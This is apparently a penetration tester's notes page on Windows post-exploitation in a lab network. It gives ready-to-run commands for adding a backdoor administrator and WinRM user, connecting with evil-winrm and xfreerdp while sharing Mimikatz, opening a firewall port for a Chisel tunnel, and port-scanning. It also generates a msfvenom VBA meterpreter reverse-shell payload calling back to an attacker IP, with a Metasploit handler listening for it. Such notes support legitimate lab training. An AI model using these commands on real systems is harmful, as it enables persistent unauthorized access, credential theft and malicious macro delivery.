Skip to content

Windows - Stabilisation & Post Exploitation

Create RDP and WinRM user

This means that (using an account with the correct privileges) we should be able to obtain either a GUI through RDP (port 3389) or a stable CLI shell using WinRM (port 5985).

Specifically, we need a user account (as opposed to the service account which we're currently using), with the "Remote Desktop Users" group for RDP, or the "Remote Management Users" group for WinRM. A user in the "Administrators" group trumps the RDP group, and the original Administrator account can access either at will. 

net user sarp password /add
net localgroup Administrators sarp /add
net localgroup "Remote Management Users" sarp /add

WinRM

Let's access the box over WinRM. For this we'll be using an awesome little tool called evil-winrm.

This does not come installed by default on Kali, so use the following command to install it from the Ruby Gem package manager:
sudo gem install evil-winrm

With evil-winrm installed, we can connect to the target with the syntax shown here:

evil-winrm -u USERNAME -p PASSWORD -i TARGET_IP
evil-winrm -u sarp -p password -i 10.200.96.150
proxychains evil-winrm -u sarp -p password -i 10.200.96.150

Note that evil-winrm usually gives medium integrity shells for added administrator accounts. Even if your new account has Administrator permissions, you won't actually be able to perform administrative actions with it via winrm.

RDP Connection

There are many RDP clients available for Linux. One of the most versatile is "xfreerdp" -- this is what we will be using here. If not already installed, you can install xfreerdp with the command: sudo apt install freerdp2-x11

As mentioned, xfreerdp is an incredibly versatile tool with a vast number of options available. These range from routing audio and USB connections into the target, through to pass-the-hash attacks over RDP. The most basic syntax for connecting is as follows:
xfreerdp /v:IP /u:USERNAME /p:PASSWORD

For example:
xfreerdp /v:172.16.0.5 /u:user /p:'password123!'

Note that (as this is a command line tool), passwords containing special characters must be enclosed in quotes.

When authentication has successfully taken place, a new window will open giving GUI access to the target.

A useful directory to share is the /usr/share/windows-resources directory on Kali. This shares most of the Windows tools stockpiled on Kali, including Mimikatz which we will be using next. This would make the full command:

xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

xfreerdp /v:10.200.96.150 /u:sarp /p:'password' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Windows

TO enable port: 

netsh advfirewall firewall add rule name="Chisel-sarp" dir=in action=allow protocol=tcp localport=47000

To import ps1 file: 

Import-Module .\Invoke-Portscan.ps1
Invoke-Portscan -Hosts 172.16.0.10 -TopPorts 50
Invoke-Portscan -hosts "192.168.1.0/24" -oA stuff
type .\alltest.gnmap | findstr Open
Host: 192.168.1.1       Open Ports: 443,53,22,5000

Create a .VBA Payload 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.76.120 LPORT=5151 -f vba

Listen for meterpreter shell 

user@AttackBox$ msfconsole -q
msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.50.159.15
LHOST => 10.50.159.15
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 10.50.159.15:443